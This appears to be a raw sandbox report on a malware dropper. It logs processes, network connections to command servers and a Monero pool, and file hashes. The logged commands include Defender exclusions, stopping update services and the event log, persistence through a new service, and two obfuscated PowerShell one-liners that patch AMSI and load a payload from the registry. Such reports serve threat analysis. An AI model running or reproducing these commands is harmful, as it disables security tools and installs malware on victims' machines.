C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe
"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "KPNEMLWP"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "KPNEMLWP" binpath= "C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YzbKDlkEvoiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NOOBoIueVBTvCZ,[Parameter(Position=1)][Type]$mPhNQzYMLi)$bYTABmYnzBr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+'e'+'','Class,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$bYTABmYnzBr.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+'e'+[Char](100)+'');$bYTABmYnzBr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](12
1)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+'',$mPhNQzYMLi,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $bYTABmYnzBr.CreateType();}$mROtnFNlpOpQK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'icro'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'eNat'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'h'+[Char](111)+'ds');$cjamcBWbUeiYFp=$mROtnFNlpOpQK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lTtkaEbeIUFkELaNQrp=YzbKDlkEvoiP @([String])([IntPtr]);$tpTTDPrIyYPNIvxmSXsCEV=YzbKDlkEvoiP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NJCFRmWYWIl=$mROtnFNlpOpQK.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$GxoauuZqFwPXeM=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$mpuImyzxFAXRXzNMp=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FjxjzMf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxoauuZqFwPXeM,$lTtkaEbeIUFkELaNQrp).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+'l'+'');$zHBcEpfJFRcJRExQE=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$FjxjzMf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$MHjpcMCHxx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,4,[ref]$MHjpcMCHxx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zHBcEpfJFRcJRExQE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,0x20,[ref]$MHjpcMCHxx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).Ent
ryPoint.Invoke($Null,$Null)"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "KPNEMLWP"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qwLHkZXFzmKZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ympiCVUcQUIwPw,[Parameter(Position=1)][Type]$dqXuQKUBhK)$fhOoLHkPBqO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+'y'+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fhOoLHkPBqO.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ympiCVUcQUIwPw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fhOoLHkPBqO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](11
7)+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$dqXuQKUBhK,$ympiCVUcQUIwPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'im'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $fhOoLHkPBqO.CreateType();}$aYDMhNBIxCkso=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+'Meth'+'o'+'d'+[Char](115)+'');$ERyGLMwEoOOMVT=$aYDMhNBIxCkso.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JeoiWKxHehfHbSHWDxh=qwLHkZXFzmKZ @([String])([IntPtr]);$cvINplqKeNJvCwMsndbxTK=qwLHkZXFzmKZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$baolUOiMTkB=$aYDMhNBIxCkso.GetMethod(''+'G'+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'and'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.d'+'l'+'l')));$rEXqfKPFSSNJzN=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+'y'+'A')));$rZORpBmFhgNwfTkSc=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+'a'+'lPr'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$KFTLLdl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rEXqfKPFSSNJzN,$JeoiWKxHehfHbSHWDxh).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+[Char](46)+'dl'+'l'+'');$WxBGdKhFwpzftvLjL=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$KFTLLdl,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+'r')));$SMIhvkSHmK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,4,[ref]$SMIhvkSHmK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WxBGdKhFwpzftvLjL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,0x20,[ref]$SMIhvkSHmK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad13a311-2a06-4d5b-a28d-c2c488daadcb}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{baac7772-f4f1-4c81-bef4-89a906e4264d}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| UA | 185.156.72.2:80 | 185.156.72.2 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | waxnps.live | udp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| US | 154.53.41.5:80 | 154.53.41.5 | tcp |
| KR | 218.236.59.183:47006 | 218.236.59.183 | tcp |
| US | 8.8.8.8:53 | battlefled.top | udp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 152.53.121.6:10128 | gulf.moneroocean.stream | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 8.8.8.8:53 | peeweelittleweeny.lol | udp |
| GB | 198.38.90.19:443 | peeweelittleweeny.lol | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.27.94:80 | c.pki.goog | tcp |
| GB | 198.38.90.19:443 | peeweelittleweeny.lol | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
| US | 154.53.41.5:1144 | | tcp |
Files
memory/5500-0-0x00007FFBC8DD3000-0x00007FFBC8DD5000-memory.dmp
memory/5500-1-0x0000000000740000-0x0000000000748000-memory.dmp
memory/5500-2-0x00007FFBC8DD0000-0x00007FFBC9891000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
| MD5 | a4800db4a176fdba6d86bde9e21d7d4b |
| SHA1 | c927378fd0aff61a865860b81ea49182ad3fc896 |
| SHA256 | 4738fee480de92666fc5cb7e6c9a4b0d97cd3d3b7ff9d642288e0cc604d407ae |
| SHA512 | cbcecf64126f92844858213e7050942c63cbdf23522e1e8ac0887c655c615239bdf4111475a7ebffa4bf700ec59b6a8125fed46201ff2238eb9d8e4c8e4236c6 |
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
| MD5 | 45445e04eeaaab44456e4296c25ddb1b |
| SHA1 | 75f242422d7329a0a3f9a1230cf694443601717e |
| SHA256 | 82f77e79a0052160d388738a17a60e3733e439dd6beb53c88232e075ccef7d6e |
